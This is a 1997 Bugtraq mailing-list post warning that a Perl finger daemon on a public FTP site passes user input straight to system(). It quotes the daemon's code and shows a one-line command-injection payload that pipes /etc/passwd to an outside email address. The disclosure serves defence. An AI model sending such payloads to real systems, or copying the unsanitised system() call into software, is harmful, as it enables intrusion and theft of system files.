[5066] in bugtraq
perl fingerd stupidity
daemon@ATHENA.MIT.EDU (Chris Terry)
Thu Jul 31 17:17:17 1997
Date: Thu, 31 Jul 1997 14:34:43 -0500
Reply-To: Chris Terry <chris@VIPER.NET>
From: Chris Terry <chris@VIPER.NET>
To: BUGTRAQ@NETSPACE.ORG
Watch out for the perl fingerd currently posted at
ftp://sunsite.unc.edu/pub/Linux/network/finger/daemons
#!/usr/bin/perl
# fingerd - a simple finger daemon
$user = <STDIN>;
chop($user);
chop($user);
if(-e "/usr/lib/finger/$user"){
system "/usr/bin/perl /usr/lib/finger/$user";
} else {
system "/usr/bin/perl /usr/lib/finger/default $user";
}
[root@batleh perl-finger]# ./fingerd
|cat /etc/passwd|mail chris@viper.net
and many others....
-----------------------------------------------------------
CGI Joe - n. A hard-core CGI script programmer with all the
social skills and charisma of a plastic action
figure. See "Chris Terry"
Chris Terry - n. ITC^DeltaCom Web/CGI guy chris@viper.net
In a world without fences, who needs Gates??
